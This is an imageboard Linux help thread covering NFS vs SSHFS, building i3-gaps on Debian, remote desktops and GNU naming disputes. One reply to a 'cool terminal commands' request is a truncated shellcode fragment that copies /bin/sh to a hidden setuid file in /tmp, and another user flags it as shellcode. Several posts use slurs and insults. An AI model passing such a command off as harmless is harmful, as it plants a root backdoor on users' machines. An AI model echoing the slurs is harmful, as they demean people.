/fglt/ - Friendly GNU/Linux Thread

Previous thread: Welcome to /fglt/ - Friendly GNU/Linux Thread.

Users of all levels are welcome to ask questions about GNU/Linux and share their experiences.

*** Please be civil, notice the "Friendly" in every Friendly GNU/Linux Thread ***

Before asking for help, please check our list of resources.

If you would like to try out GNU/Linux you can do one of the following:
0) Install a GNU/Linux distribution of your choice in a Virtual Machine.
1) Use a live image and to boot directly into the GNU/Linux distribution without installing anything.
2) Dual boot the GNU/Linux distribution of your choice along with Windows or macOS.
3) Go balls deep and replace everything with GNU/Linux.

Your friendly neighborhood search engine.

$ man %command%
$ info %command%
$ help %command%
$ %command% -h
$ %command% --help

Don't know what to look for?
$ apropos %something%

Check the Wikis (most troubleshoots work for all distros):

Sup Forums's Wiki on GNU/Linux:

>What distro should I choose?

>What are some cool programs?

>What are some cool terminal commands?

>Where can I learn the command line?

>Where can I learn more about Free Software?

>How to break out of the botnet?

/t/'s GNU/Linux Games: /t/'s GNU/Linux Videos: /fglt/'s website and copypasta collection:
fglt.nl && p.teknik.io/wJ9Zy

Other urls found in this thread:


First for:
musl c


>not tcc

What's wrong with NFS?

why not plan9port?
it's more muh unix than memebox.

Can we have a thread without acting like retards? Just for fun.

What's wrong with alternative software?
Does it not conform to your gnu only mind set?

NFS is unencrypted over the wire and has shit security unless you use NFSv4 with a full Kerberos setup. Setting up 9p tunneled over SSH is smarter long run.

If there is a problem with the connection it will lock up whatever process was doing IO on the client :(

You can avoid that with doing a "umount -l" of the mountpoint.

Kinda depends if you are willing to sacrifice speed in favour of encrypting data on your local network.

You should be. There's a reason nobody uses telnet anymore.
>mfw my keyboard tried to autocorrect telnet to talmud

compatibility, availability

How can you unmount when the zombie process still has a handle to it?

That's what the -l flag does. Lazy unmount. It doesn't clean up the handles before disconnecting. You can then kill -9 the zombie.

telnet was used to get a login. nfs is used to share files. SSH is designed for interactive sessions, it is slow when using it for bulk transfers, just look at ssh-hp. Blindly saying "use ssh!" without paying attention to the situation under discussion is a pretty shitty way to go about giving advice.

C-c-could someone please help me install i3-gaps on Debian Stretch?
I already have i3 and I found this script that says it makes a deb package for Jesse or newer:
I downloaded the i3-gaps-deb from the raw link
and now have a file named "i3-gaps-deb" in my home directory.
I changed permissions to make it executable (chmod 755 i3-gaps-deb), but I can't run it by typing it's name. How does this work?

sudo dpkg -i /path/to/my.deb

NFS sucks nuts over slow links, especially with directories containing lots of files. Anything less than 100Mbps real throughput (read: most wifi) should be using SSHFS instead. If you have a trusted storage subnet isolated from the WAN and wifi, then yeah, NFS can be useful.

IIRC you can also use apt or aptitude (but not apt-get) to install a local .deb and do dependency handling at the same time.

...but I don't have a deb package?
I did try that with the script's locations and it said:
>dpkg-deb: error: '/home/user/i3-gaps-deb' is not a debian format archive subprocess dpkg-deb --control returned error exit status 2
>Errors were encountered while processing:

So maybe the questions is, how do I make a deb package? I thought that was the what the script I linked to was made to do.

Oh, you have to type in the path to it, not just its name because it is not in your PATH.
Eg ./i3-gaps-deb if you are in the same directory.

What the fuck kind of retard are you? Did you download a source archive?

Install Source Mage GNU/Linux.

>Did you download a source archive?
It doesn't look like it
Thank you, but I am still getting the same error. I don't think the thing I saved was a deb package.

You're a goddamn moron. People told you to execute it with ./i3-gaps-deb from the directory that contains the file and you still managed to fuck it up. Maybe go back to GNOME for now.

Thank you :3
The problem was that I had assumed we were still talking about using dpkg and not running the script itself. This is my first time using Linux so everything is new to me although I suppose it should have been clear to any non-moron no matter how inexperienced since the script clearly says it is for creating and installing a deb package therefore I should have known that he was talking about just straight up running the script when he said to use the path to it.
Thanks again.

What's a good Linux remote desktop software for VPS in 2017?

It's so out of vogue now, the information on the web is mostly out-of-date.

Need both server and client recommendation (if not both provided by the same package).

X forewarding

I use xpra on my local network, which is like X forwarding but applications don't crash if you disconnect. It uses h264 over ssh by default so reasonable performance over the network. But really, if you are talking to a VPS just use a terminal.

Why are some people against GNU? Is it just the "It's just Linux" thing, or is more behind it?
>GNU is about freedom, what's wrong with freedom?


i think its a mix of:
- freedom to turn free software into proprietary software is true freedom (bsd-faggotry)
- people mad about interjections
- shills astroturfing

under the thumb, shilling or being stupid

Brand whores are convinced that "Linux" makes a better brand than "GNU/Linux".

What are some cool terminal commands?

I dont believe in the loose 4 commandants,that allow you to follow them when they want to,it like its cool mang.
I dont believe in their false prophet rms.
Every freetard i have ever had an interaction with has been positive and derails in to how they break their moral and ethical code when it is most pleasant for them. Basically freetards have no back bone and would rather not inconvenience them selves to uphold the montra they spew out.

systemd-analyze and systemd-blame

They're cool because systemd

nice word filters

RMS was to friendly and GNU/Linux was a mistake. It makes people think: "Why mention GNU in my Linux system" and doesn't solve the actual problem. People still think Linux is a complete system, think in terms of "Linux box", "Linux commandline" etc and go to find reasons to BTFO interjections. It's just GNU

>Since Linux is a secondary contribution, would it be false to the facts to call the system simply “GNU”? (#justgnu)
It would not be false to the facts, but it is not the best thing to do. Here are the reasons we call that system version “GNU/Linux” rather than just “GNU”:

It's not exactly GNU—it has a different kernel (that is, Linux). Distinguishing GNU/Linux from GNU is useful.
It would be ungentlemanly to ask people to stop giving any credit to Linus Torvalds. He did write an important component of the system. We want to get credit for launching and sustaining the system's development, but this doesn't mean we should treat Linus the same way those who call the system “Linux” treat us. We strongly disagree with his political views, but we deal with that disagreement honorably and openly, rather than by trying to cut him out of the credit for his contribution to the system.
Since many people know of the system as “Linux”, if we say “GNU” they may simply not recognize we're talking about the same system. If we say “GNU/Linux”, they can make a connection to what they have heard about.

>Why are some people against GNU?
it's Sup Forums, retard

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755

python3 -c $'import math,random,subprocess,time\ns=int(subprocess.check_output(["stty", "size"]).split()[1])\nn=0\nwhile 1:print(" "*int(s/2+s/2*math.sin(n))+"\e[38;5;"+str(random.randint(17,231))+"m*\e[m");time.sleep(.05);n+=.1'

Now in color.

lsort() {
awk '{ print length(), $0 }' | sort -n | cut -d ' ' -f2-


So with Dolphin file browser on Fedora, if i ever move, delete or write a large files etc it will not show like a loading bar, or something that tells you what is moving, deleting, the percentage copied or the amount of MB, kb, or gb copied so far. How can i enable this? I love dolphin file browser but this pisses me off

Holy fuck GNU fags are retarded. It's linux, not GNU/linux. Fucking dumb shit GNU faggots, fucking die.

gnu is less then 8% of the Linux environment yet they want 50% ownership.

Linux is a kernel. Download it here: kernel.org/ show how you runin it on its own or even create an "environment".

Dont run that its shellcode

musl c for libc
llvm/busybox for userland
clang for compiler

>show how you runin it on its own
Did you reply to the wrong post?

What distro should I run if I want to experience redhat at home?

Is redhat a server OS not meant to be used locally?

>gnu is less then 8% of the Linux environment yet they want 50% ownership.
Are you reffering to that pie chart that for some reason conveniently counted GNU and GNOME (GNU Object Model Environment) as separate entities to prevent GNU from being a "bigger" entity than the Linux kernel?

Because I think you do you sneaky kike.

I dont use GNOME or its dependencies.My distro does not force de/wm's on me.
>freetard on suicide watch

CentOS is rhel build from rhel sources made available by redhat without the copyrighted content as well as patches tha redhat violates the gpl license with.

Fedora is also the "upstream" version of redhat ie. evey redhat release since i think 5 has been built on previous (older) fedora version.

How does your private installation of a particular system change anything?

>>freetard on suicide watch
This is why you're getting nowhere with such discussion. All of you are unable to provide a compelling arguments to back your opinions. The only thing you can do is regurgitate, insult and project.

So on distros that ship with KDE as default.Gnu is 8% of their distro while kde is a larger amount.
So on distros that shit xfce/lxde as default? Gnu is 8% of their distro while XFCE/lxde is a larger amount.

You havent provided any compelling arguments other then "DA UHH BUT GNOME".

>Gnu is 8% of their distro while XFCE/lxde is a larger amount.
Both XFCE and LXDE are GTK.

Besides, once again reffering to the chart you were reffering. It took in account ENTIRE codebase of the "main" repository of this particular release of Ubuntu they were using as reference. I'm fairly sure on your run of the mill installation whether it's a desktop or a server GNU stuff takes a considerably larger part than "just" 13%.

Your point is as always turned moot because Linux is *JUST* the aforementioned 9% so If GNU with 13% doesn't deserve to be mentioned in the GNU/Linux or Linux/GNU (if for some reason it's preferred) Linux doesn't either.

situational report.
My crude reimplementation of redshift's functionality in sct works beatifully.

should i stop smoking?
post ending in 01-09 defines the days left

Stop right now; don't be a tabacco industry cuck.

Don't get trolled by GNUfags. True freedom means smoking taback whenever you want. Enjoy your tabacko.

Why does Linux has the "input lag" feeling compared to windows classic?

checkem && stop now

don't use a compositor

blame torvalds for implementing lag

which *buntu lets me do taht?

Known Linux problem. You can fix it by installing Gentoo.


Some retards may recommend instlling some Ubuntu flavor, but don't fall for it.

Linux behaves like the users using it.

cuz linux is shit, install win10 which is the best operating system

why are people still using i3 when sway exists?

Why are people still using X11 when wayland exists?

I've actually worked on sway, and I can say: it's still got a lot of flaws.


exactly doesn't make any sense

because wayland is beta trash, call me when its finished


If I were Google, I'd go Linux.
>implement some google only features in Linux
>buy driver patents, deliver them at Linux
>create an app store
google is stupid

That's literally what Google did. See Android.

And ChromeOS.

Has anyone tried Uruk?

I restarted my laptop and a black screen with "welcome to emergency mode" appeared, after trying a few tries it worked. Why that happened? Now I'm afraid to reboot again.

Agreed to all of these except busybox. GNU utils are just so much better for desktop use.

best way to convert ALAC/m4a to FLAC in gnu/linux?

Why are there so many idiots posting idiotic comments whenever something Linux related comes up?
Why do those idiots parrot things they aren't 100% sure they're true? Why do they parrot things they know they have no knowledge of? Do they really think no one will notice their stupidity?

Wayland has reached the 1.0 release. The core protocols are finished.

Every distribution lets you do that.


Reboot, reinstall the os, come on man you just bitch out as soon as something goes wrong? At least here you're given clues in comparison to Windows 10 SOMETHING HAPPENED.


Why would you want to convert a lossy format into a lossless format?

>freedom to turn free software into proprietary software is true freedom (bsd-faggotry)
I never understood this. Yes, YOU are free to use non-free software but free software is only free when it's, well, free. If you turn it into something proprietary then it's no longer free. People love to stretch the word to beyond its limits just to validate their use of shitty proprietary apps.

alias systemd-anal='systemd-analyze'
It's funny

lol haha, reposted at reddit linuxmasterrace at this very moment

thank you brother
make sure to credit me so that I get some of that karma too

Include me in your screenshot.

Can anyone recommend something for making raids? I know about mdadm but this will be my first raid and I don't want to fuck something up accidentaly.
Maybe there is something good with a GUI?

i3 or openbox?

No thanks.